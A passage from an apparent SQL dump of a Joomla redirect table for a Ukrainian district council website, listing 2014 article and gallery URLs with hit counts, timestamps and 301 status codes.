00:00:00',301),(1460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en','','','',11,0,'2014-09-17 16:45:29','0000-00-00 00:00:00',301),(1461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en','','','',9,0,'2014-09-17 16:45:32','0000-00-00 00:00:00',301),(1462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en','','','',10,0,'2014-09-17 16:45:36','0000-00-00 00:00:00',301),(1463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=uk','','','',10,0,'2014-09-17 16:45:38','0000-00-00 00:00:00',301),(1464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en','','','',9,0,'2014-09-17 16:45:52','0000-00-00 00:00:00',301),(1465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=en','','','',10,0,'2014-09-17 16:46:46','0000-00-00 00:00:00',301),(1466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-17 16:47:08','0000-00-00 00:00:00',301),(1467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-17 16:47:09','0000-00-00 00:00:00',301),(1468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-17 16:47:23','0000-00-00 00:00:00',301),(1469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',14,0,'2014-09-17 16:48:15','0000-00-00 00:00:00',301),(1470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 16:48:56','0000-00-00 00:00:00',301),(1471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-17 16:50:24','0000-00-00 00:00:00',301),(1472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=uk','','','',8,0,'2014-09-17 16:50:49','0000-00-00 00:00:00',301),(1473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-17 16:51:15','0000-00-00 00:00:00',301),(1474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-17 16:52:04','0000-00-00 00:00:00',301),(1475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=uk','','','',31,0,'2014-09-17 16:53:21','0000-00-00 00:00:00',301),(1476,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-17 16:54:55','0000-00-00 00:00:00',301),(1477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-17 17:09:20','0000-00-00 00:00:00',301),(1478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 17:09:32','0000-00-00 00:00:00',301),(1479,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=ru','','','',8,0,'2014-09-17 17:17:58','0000-00-00 00:00:00',301),(1480,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-17 17:22:13','0000-00-00 00:00:00',301),(1481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=en','','','',3,0,'2014-09-17 17:36:05','0000-00-00 00:00:00',301),(1482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=ru','','','',3,0,'2014-09-17 17:40:19','0000-00-00 00:00:00',301),(1483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-17 17:57:15','0000-00-00 00:00:00',301),(1484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',23,0,'2014-09-17 17:58:03','0000-00-00 00:00:00',301),(1485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=en','','','',9,0,'2014-09-17 18:00:41','0000-00-00 00:00:00',301),(1486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=en','','','',4,0,'2014-09-17 18:11:06','0000-00-00 00:00:00',301),(1487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-17 18:13:14','0000-00-00 00:00:00',301),(1488,'http://www.malyn-rayrada.org.ua/images/stories/pagat.php?rf','','','',25,0,'2014-09-17 18:13:17','0000-00-00 00:00:00',301),(1489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 18:14:02','0000-00-00 00:00:00',301),(1490,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-17 18:16:12','0000-00-00 00:00:00',301),(1491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-17 18:19:11','0000-00-00 00:00:00',301),(1492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=en','','','',17,0,'2014-09-17 18:19:17','0000-00-00 00:00:00',301),(1493,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-17 18:20:48','0000-00-00 00:00:00',301),(1494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=en','','','',5,0,'2014-09-17 18:21:23','0000-00-00 00:00:00',301),(1495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-17 18:24:48','0000-00-00 00:00:00',301),(1496,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=ru','','','',10,0,'2014-09-17 18:25:04','0000-00-00 00:00:00',301),(1497,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-17 18:30:42','0000-00-00 00:00:00',301),(1498,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en&Itemid=0','','','',6,0,'2014-09-17 18:31:47','0000-00-00 00:00:00',301),(1499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47&Itemid=86&lang=en','','','',5,0,'2014-09-17 18:33:41','0000-00-00 00:00:00',301),(1500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=uk','','','',10,0,'2014-09-17 18:34:14','0000-00-00 00:00:00',301),(1501,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:----l---------2011-2014-r-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-17 18:36:11','0000-00-00 00:00:00',301),(1502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-17 18:36:53','0000-00-00 00:00:00',301),(1503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-17 18:37:47','0000-00-00 00:00:00',301),(1504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-17 18:38:07','0000-00-00 00:00:00',301),(1505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-17 18:38:16','0000-00-00 00:00:00',301),(1506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-17 18:39:02','0000-00-00 00:00:00',301),(1507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49&Itemid=88&lang=uk','','','',7,0,'2014-09-17 18:39:42','0000-00-00 00:00:00',301),(1508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-17 18:39:58','0000-00-00 00:00:00',301),(1509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 18:41:01','0000-00-00 00:00:00',301),(1510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',29,0,'2014-09-17 18:41:13','0000-00-00 00:00:00',301),(1511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=ru','','','',19,0,'2014-09-17 18:41:45','0000-00-00 00:00:00',301),(1512,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-17 18:41:51','0000-00-00 00:00:00',301),(1513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',5,0,'2014-09-17 18:42:16','0000-00-00 00:00:00',301),(1514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-17 18:42:18','0000-00-00 00:00:00',301),(1515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-17 18:43:31','0000-00-00 00:00:00',301),(1516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-17 18:43:43','0000-00-00 00:00:00',301),(1517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&Itemid=14&lang=en','','','',16,0,'2014-09-17 18:44:12','0000-00-00 00:00:00',301),(1518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-17 18:44:22','0000-00-00 00:00:00',301),(1519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-17 18:45:25','0000-00-00 00:00:00',301),(1520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-17 18:50:10','0000-00-00 00:00:00',301),(1521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 18:51:08','0000-00-00 00:00:00',301),(1522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-17 18:51:59','0000-00-00 00:00:00',301),(1523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=ru','','','',18,0,'2014-09-17 18:54:00','0000-00-00 00:00:00',301),(1524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=en','','','',5,0,'2014-09-17 18:54:47','0000-00-00 00:00:00',301),(1525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-17 18:55:30','0000-00-00 00:00:00',301),(1526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46&Itemid=85&lang=ru','','','',3,0,'2014-09-17 18:56:08','0000-00-00 00:00:00',301),(1527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46:--21122012&Itemid=85&lang=en','','','',18,0,'2014-09-17 18:57:24','0000-00-00 00:00:00',301),(1528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=en','','','',5,0,'2014-09-17 18:58:27','0000-00-00 00:00:00',301),(1529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 18:58:57','0000-00-00 00:00:00',301),(1530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:--------------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-17 18:59:41','0000-00-00 00:00:00',301),(1531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 19:00:11','0000-00-00 00:00:00',301),(1532,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1142:-l-r-&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=+%D0%BF%D1%80%D0%BE+%D0%BF%D0%BE%D1%87%D0%B0%D1%82%D0%BE%D0%BA+%D0%BD%D0%B0%D0%B2%D1%87%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B3','',3,0,'2014-09-17 19:00:15','0000-00-00 00:00:00',301),(1533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk','','','',8,0,'2014-09-17 19:00:33','0000-00-00 00:00:00',301),(1534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-17 19:01:28','0000-00-00 00:00:00',301),(1535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk','','','',4,0,'2014-09-17 19:02:25','0000-00-00 00:00:00',301),(1536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-17 19:04:07','0000-00-00 00:00:00',301),(1537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk','','','',9,0,'2014-09-17 19:05:17','0000-00-00 00:00:00',301),(1538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53&Itemid=94&lang=uk','','','',9,0,'2014-09-17 19:06:18','0000-00-00 00:00:00',301),(1539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-17 19:09:52','0000-00-00 00:00:00',301),(1540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 19:10:42','0000-00-00 00:00:00',301),(1541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-17 19:16:37','0000-00-00 00:00:00',301),(1542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',12,0,'2014-09-17 19:17:39','0000-00-00 00:00:00',301),(1543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-17 19:18:34','0000-00-00 00:00:00',301),(1544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=uk','','','',5,0,'2014-09-17 19:19:36','0000-00-00 00:00:00',301),(1545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-17 19:20:54','0000-00-00 00:00:00',301),(1546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-17 19:23:24','0000-00-00 00:00:00',301),(1547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-17 19:25:16','0000-00-00 00:00:00',301),(1548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54&Itemid=95&lang=ru','','','',4,0,'2014-09-17 19:26:11','0000-00-00 00:00:00',301),(1549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-17 19:26:54','0000-00-00 00:00:00',301),(1550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-17 19:29:36','0000-00-00 00:00:00',301),(1551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46:--21122012&Itemid=85&lang=ru','','','',5,0,'2014-09-17 19:30:48','0000-00-00 00:00:00',301),(1552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-17 19:35:17','0000-00-00 00:00:00',301),(1553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-17 19:35:30','0000-00-00 00:00:00',301),(1554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-17 19:36:29','0000-00-00 00:00:00',301),(1555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-17 19:37:23','0000-00-00 00:00:00',301),(1556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=en&Itemid=','','','',5,0,'2014-09-17 19:38:08','0000-00-00 00:00:00',301),(1557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53:--25102013-&Itemid=94&lang=uk','','','',8,0,'2014-09-17 19:39:19','0000-00-00 00:00:00',301),(1558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=en','','','',8,0,'2014-09-17 19:40:28','0000-00-00 00:00:00',301),(1559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=ru','','','',5,0,'2014-09-17 19:40:49','0000-00-00 00:00:00',301),(1560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32&Itemid=64&lang=ru','','','',28,0,'2014-09-17 19:41:15','0000-00-00 00:00:00',301),(1561,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-17 19:41:52','0000-00-00 00:00:00',301),(1562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-17 19:42:29','0000-00-00 00:00:00',301),(1563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-17 19:43:04','0000-00-00 00:00:00',301),(1564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-17 19:44:03','0000-00-00 00:00:00',301),(1565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=ru','','','',13,0,'2014-09-17 19:44:17','0000-00-00 00:00:00',301),(1566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-17 19:46:03','0000-00-00 00:00:00',301),(1567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=uk','','','',24,0,'2014-09-17 19:46:27','0000-00-00 00:00:00',301),(1568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&Itemid=14&lang=en','','','',21,0,'2014-09-17 19:53:57','0000-00-00 00:00:00',301),(1569,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=ru','','','',7,0,'2014-09-17 19:55:12','0000-00-00 00:00:00',301),(1570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=en','','','',9,0,'2014-09-17 19:56:59','0000-00-00 00:00:00',301),(1571,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=uk','','','',3,0,'2014-09-17 20:00:03','0000-00-00 00:00:00',301),(1572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 20:00:10','0000-00-00 00:00:00',301),(1573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51:--19072013-&Itemid=92&lang=en','','','',4,0,'2014-09-17 20:01:45','0000-00-00 00:00:00',301),(1574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-17 20:01:51','0000-00-00 00:00:00',301),(1575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-17 20:04:07','0000-00-00 00:00:00',301),(1576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=ru','','','',9,0,'2014-09-17 20:05:29','0000-00-00 00:00:00',301),(1577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-17 20:06:15','0000-00-00 00:00:00',301),(1578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',15,0,'2014-09-17 20:06:17','0000-00-00 00:00:00',301),(1579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-17 20:06:50','0000-00-00 00:00:00',301),(1580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49&Itemid=88&lang=en','','','',6,0,'2014-09-17 20:06:52','0000-00-00 00:00:00',301),(1581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-09-17 20:07:23','0000-00-00 00:00:00',301),(1582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=uk','','','',3,0,'2014-09-17 20:07:25','0000-00-00 00:00:00',301),(1583,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53&Itemid=94&lang=uk','','','',9,0,'2014-09-17 20:09:59','0000-00-00 00:00:00',301),(1584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 20:11:16','0000-00-00 00:00:00',301),(1585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-09-17 20:11:45','0000-00-00 00:00:00',301),(1586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 20:11:50','0000-00-00 00:00:00',301),(1587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-17 20:12:22','0000-00-00 00:00:00',301),(1588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 20:12:35','0000-00-00 00:00:00',301),(1589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=uk','','','',6,0,'2014-09-17 20:13:10','0000-00-00 00:00:00',301),(1590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en','','','',6,0,'2014-09-17 20:14:06','0000-00-00 00:00:00',301),(1591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-17 20:15:49','0000-00-00 00:00:00',301),(1592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=uk','','','',6,0,'2014-09-17 20:15:52','0000-00-00 00:00:00',301),(1593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-17 20:17:16','0000-00-00 00:00:00',301),(1594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 20:17:51','0000-00-00 00:00:00',301),(1595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=uk','','','',12,0,'2014-09-17 20:18:20','0000-00-00 00:00:00',301),(1596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-17 20:19:12','0000-00-00 00:00:00',301),(1597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=en&Itemid=','','','',10,0,'2014-09-17 20:19:45','0000-00-00 00:00:00',301),(1598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=en','','','',9,0,'2014-09-17 